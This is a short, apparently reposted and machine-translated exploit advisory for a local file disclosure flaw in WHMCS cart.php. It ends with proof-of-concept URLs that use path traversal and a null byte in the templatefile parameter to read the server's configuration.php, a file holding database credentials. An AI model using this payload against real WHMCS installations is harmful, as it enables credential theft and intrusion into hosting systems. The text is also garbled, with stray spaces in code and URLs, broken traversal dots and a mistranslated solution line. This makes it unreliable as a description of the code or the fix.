Title: WHMCompleteSolution (cart. php) Local File Disclosure
Author: Lagripe-Dz www.2cto.com
Developer: WHMCS (WHMCompleteSolution) http://whmcs.com/
Affected Versions: 3.x. x, 4.0.x
Test Platform: linux + apache
Defect file: cart. php
---------
Code Analysis:
---------
If ($ a = "add ")
{
$ Templatefile = "configureproductdomain ";
... Etc
}
If ($ a = "login ")
{
$ Templatefile = "login ";
... Etc
}
...
OutputClientArea ($ templatefile, $ nowrapper );
# OutputClientArea function will display
"./Templates/orderforms/cart/{$ templatefile}. tpl"
Details:
---------
If variable "$ a" has a true value... will set "$ templatefile" value
Default
But when "$ a" value didn't match the defaults values
You can control "$ templatefile" and use it as (File Disclosure)
Test proof:
------------------
Http://www.bkjia.com/[PATH]/cart. php? A = [wrong_value] & templatefile = [LFD] % 00
Http://www.bkjia.com/[PATH]/cart. php? A = test & templatefile =.../../configuration. php % 00
Note *: show the page source to see Disclosure file.
Solution:
----------
Pay attention to developing this announcement and upgrade to the latest version.
========================================================== ======================================
Greetz To All Sec4ever.com Members.